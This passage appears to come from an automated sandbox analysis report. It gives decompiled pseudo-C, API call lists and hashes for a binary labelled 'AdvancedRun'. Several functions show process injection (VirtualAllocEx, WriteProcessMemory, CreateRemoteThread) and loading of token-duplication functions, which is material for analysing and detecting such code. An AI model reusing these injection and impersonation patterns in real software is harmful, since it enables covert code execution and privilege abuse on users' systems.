                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                • memset.MSVCRT ref: 0040A66E
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                • API String ID: 1572607441-20550370
                                                                                                                • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                0x004028a3
                                                                                                                0x004028ab
                                                                                                                0x004028bd
                                                                                                                0x004028ca
                                                                                                                0x004028d7
                                                                                                                0x004028e3
                                                                                                                0x004028e6
                                                                                                                0x004028e8
                                                                                                                0x00000000
                                                                                                                0x004028eb
                                                                                                                0x004028ec

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                • API String ID: 2238633743-1970996977
                                                                                                                • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                0x0040a27d
                                                                                                                0x0040a286
                                                                                                                0x0040a290
                                                                                                                0x0040a29d
                                                                                                                0x00000000
                                                                                                                0x0040a32f
                                                                                                                0x0040a29f
                                                                                                                0x0040a2a4
                                                                                                                0x0040a2ad
                                                                                                                0x0040a2b6
                                                                                                                0x0040a2bc
                                                                                                                0x0040a2be
                                                                                                                0x0040a2c4
                                                                                                                0x0040a2c8
                                                                                                                0x0040a2ce
                                                                                                                0x0040a2e3
                                                                                                                0x0040a2ed
                                                                                                                0x0040a2fb
                                                                                                                0x0040a2fe
                                                                                                                0x0040a305
                                                                                                                0x0040a30c
                                                                                                                0x0040a30f
                                                                                                                0x0040a313
                                                                                                                0x00000000
                                                                                                                0x0040a31a
                                                                                                                0x0040a338

                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                  • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                  • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                • String ID: $
                                                                                                                • API String ID: 283512611-3993045852
                                                                                                                • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                0x00401093
                                                                                                                0x00401096
                                                                                                                0x00401097
                                                                                                                0x0040109b
                                                                                                                0x004010a3
                                                                                                                0x004010a5
                                                                                                                0x00401270
                                                                                                                0x00401278
                                                                                                                0x004012b3
                                                                                                                0x0040127a
                                                                                                                0x00401293
                                                                                                                0x004012a2
                                                                                                                0x004012a2
                                                                                                                0x004012c1
                                                                                                                0x004012d9
                                                                                                                0x004012ea
                                                                                                                0x004012ec
                                                                                                                0x004012f6
                                                                                                                0x00000000
                                                                                                                0x004010ab
                                                                                                                0x004010ab
                                                                                                                0x004010ac
                                                                                                                0x00401231
                                                                                                                0x00401236
                                                                                                                0x00401239
                                                                                                                0x0040123d
                                                                                                                0x00401249
                                                                                                                0x00401249
                                                                                                                0x0040124c
                                                                                                                0x00000000
                                                                                                                0x00401252
                                                                                                                0x00401259
                                                                                                                0x00401265
                                                                                                                0x00000000
                                                                                                                0x00401265
                                                                                                                0x0040123f
                                                                                                                0x0040123f
                                                                                                                0x00401243
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401243
                                                                                                                0x004010b2
                                                                                                                0x004010b2
                                                                                                                0x004010b5
                                                                                                                0x004011e1
                                                                                                                0x004011e3
                                                                                                                0x004011e6
                                                                                                                0x0040120e
                                                                                                                0x00401216
                                                                                                                0x00000000
                                                                                                                0x0040121c
                                                                                                                0x00401224
                                                                                                                0x00401226
                                                                                                                0x00401229
                                                                                                                0x00000000
                                                                                                                0x0040122f
                                                                                                                0x00000000
                                                                                                                0x0040122f
                                                                                                                0x00401229
                                                                                                                0x004011e8
                                                                                                                0x004011e8
                                                                                                                0x004011ed
                                                                                                                0x004011fb
                                                                                                                0x00401203
                                                                                                                0x00401203
                                                                                                                0x004010bb
                                                                                                                0x004010bb
                                                                                                                0x004010c0
                                                                                                                0x00401151
                                                                                                                0x0040115a
                                                                                                                0x00401168
                                                                                                                0x0040116b
                                                                                                                0x0040116e
                                                                                                                0x00401170
                                                                                                                0x00401173
                                                                                                                0x00401180
                                                                                                                0x00401182
                                                                                                                0x00401185
                                                                                                                0x004011a4
                                                                                                                0x004011ac
                                                                                                                0x00000000
                                                                                                                0x004011b2
                                                                                                                0x004011ba
                                                                                                                0x004011bc
                                                                                                                0x004011c7
                                                                                                                0x004011c9
                                                                                                                0x004011cb
                                                                                                                0x00000000
                                                                                                                0x004011d1
                                                                                                                0x00000000
                                                                                                                0x004011d1
                                                                                                                0x004011cb
                                                                                                                0x00401187
                                                                                                                0x00401187
                                                                                                                0x00401199
                                                                                                                0x00000000
                                                                                                                0x00401199
                                                                                                                0x004010c6
                                                                                                                0x004010c8
                                                                                                                0x004012fd
                                                                                                                0x004012fd
                                                                                                                0x004012fd
                                                                                                                0x004010ce
                                                                                                                0x004010ce
                                                                                                                0x004010d7
                                                                                                                0x004010e5
                                                                                                                0x004010e8
                                                                                                                0x004010eb
                                                                                                                0x004010ed
                                                                                                                0x004010f0
                                                                                                                0x00401102
                                                                                                                0x0040111d
                                                                                                                0x00401125
                                                                                                                0x00000000
                                                                                                                0x0040112b
                                                                                                                0x00401133
                                                                                                                0x00401135
                                                                                                                0x00401140
                                                                                                                0x00401142
                                                                                                                0x00401144
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x0040114a
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x00401144
                                                                                                                0x00401104
                                                                                                                0x0040110a
                                                                                                                0x0040110b
                                                                                                                0x0040110b
                                                                                                                0x0040110e
                                                                                                                0x00401115
                                                                                                                0x00401117
                                                                                                                0x00401117
                                                                                                                0x00401102
                                                                                                                0x004010c8
                                                                                                                0x004010c0
                                                                                                                0x004010b5
                                                                                                                0x004010ac
                                                                                                                0x00401303

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID: AdvancedRun
                                                                                                                • API String ID: 829165378-481304740
                                                                                                                • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                0x00408ae3
                                                                                                                0x00408aeb
                                                                                                                0x00408af3
                                                                                                                0x00408b76
                                                                                                                0x00408b8a
                                                                                                                0x00408b91
                                                                                                                0x00408b98
                                                                                                                0x00408bb1
                                                                                                                0x00408bb3
                                                                                                                0x00408bc6
                                                                                                                0x00408bcc
                                                                                                                0x00408bda
                                                                                                                0x00408be0
                                                                                                                0x00408bf3
                                                                                                                0x00408bfa
                                                                                                                0x00408c0b
                                                                                                                0x00408c12
                                                                                                                0x00408c17
                                                                                                                0x00408c1a
                                                                                                                0x00408c2c
                                                                                                                0x00408c39
                                                                                                                0x00408c3d
                                                                                                                0x00408c3f
                                                                                                                0x00408c41
                                                                                                                0x00408c52
                                                                                                                0x00408c58
                                                                                                                0x00408c58
                                                                                                                0x00408c6f
                                                                                                                0x00408c71
                                                                                                                0x00408c73
                                                                                                                0x00408c83
                                                                                                                0x00408c89
                                                                                                                0x00408c89
                                                                                                                0x00408c8a
                                                                                                                0x00408c8f
                                                                                                                0x00408c91
                                                                                                                0x00408c9a
                                                                                                                0x00408c93
                                                                                                                0x00408c93
                                                                                                                0x00408c93
                                                                                                                0x00408c9f
                                                                                                                0x00408ca5
                                                                                                                0x00408caf
                                                                                                                0x00408cbc
                                                                                                                0x00408cc2
                                                                                                                0x00408cc7
                                                                                                                0x00408ccd
                                                                                                                0x00408cd0
                                                                                                                0x00408cd6
                                                                                                                0x00408cd7
                                                                                                                0x00408cd8
                                                                                                                0x00408cde
                                                                                                                0x00408ce3
                                                                                                                0x00408ceb
                                                                                                                0x00408cfe
                                                                                                                0x00408d03
                                                                                                                0x00408d06
                                                                                                                0x00408d0c
                                                                                                                0x00408d21
                                                                                                                0x00408d27
                                                                                                                0x00408d0c
                                                                                                                0x00000000
                                                                                                                0x00408ca7
                                                                                                                0x00408ca7
                                                                                                                0x00408cad
                                                                                                                0x00408d28
                                                                                                                0x00408d2e
                                                                                                                0x00408d35
                                                                                                                0x00408d36
                                                                                                                0x00408d42
                                                                                                                0x00408d48
                                                                                                                0x00408d4e
                                                                                                                0x00408d54
                                                                                                                0x00408d5a
                                                                                                                0x00408d60
                                                                                                                0x00408d66
                                                                                                                0x00408d6c
                                                                                                                0x00408d72
                                                                                                                0x00408d73
                                                                                                                0x00408d7f
                                                                                                                0x00408d85
                                                                                                                0x00408d8a
                                                                                                                0x00408d8f
                                                                                                                0x00408d90
                                                                                                                0x00408da8
                                                                                                                0x00408db9
                                                                                                                0x00408dbf
                                                                                                                0x00408dc5
                                                                                                                0x00408dc5
                                                                                                                0x00000000
                                                                                                                0x00408cad
                                                                                                                0x00408ca5
                                                                                                                0x00408af6
                                                                                                                0x00408afc
                                                                                                                0x00408b07
                                                                                                                0x00408b2a
                                                                                                                0x00408b38
                                                                                                                0x00408b53
                                                                                                                0x00408b56
                                                                                                                0x00408b62
                                                                                                                0x00408b6a
                                                                                                                0x00408b6a
                                                                                                                0x00408b2a
                                                                                                                0x00408b07
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                • {Unknown}, xrefs: 00408BA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
